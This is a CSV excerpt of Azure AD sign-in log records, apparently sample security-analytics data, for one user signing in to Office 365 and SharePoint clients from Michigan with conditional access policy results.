Online,1f656d90-8802-4e53-aa2e-754646090c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1244,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:34.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cd4ef539-3abf-47a9-8c2d-81c3778b331d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bdaa6480e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c95450b3-582d-4306-9dd2-9bdaa6480e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1245,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:34.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cd4ef539-3abf-47a9-8c2d-81c3778b331d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bdaa6480e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c95450b3-582d-4306-9dd2-9bdaa6480e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1246,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d14fc9c4-6509-4344-8cf2-733989e17228,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4de8b410e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f81997e3-0b26-42cc-8532-c4de8b410e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1247,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,27cdd1bc-88d2-4336-81bc-12b84fdaca79,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",875c831a-2c9c-4e0a-b7c7-b83012f80c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,875c831a-2c9c-4e0a-b7c7-b83012f80c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1248,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:19.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76c1469f-50f6-0000-5683-4da039f2d35e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1f656d90-8802-4e53-aa2e-754601120c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1f656d90-8802-4e53-aa2e-754601120c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1249,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d27a20f0-89eb-4f7d-b380-cb35cf77f904,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3ce6a9c0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5f11d930-41ca-43a7-b362-f3ce6a9c0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1250,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7d763fec-8d4c-4b0c-b8a8-8de82e223bd9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5423bf62-9037-4448-bcaa-303305560c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5423bf62-9037-4448-bcaa-303305560c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1251,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d14fc9c4-6509-4344-8cf2-733989e17228,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4de8b410e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f81997e3-0b26-42cc-8532-c4de8b410e00,SigninLogs,Sucess,41.90428925,-85.99833679
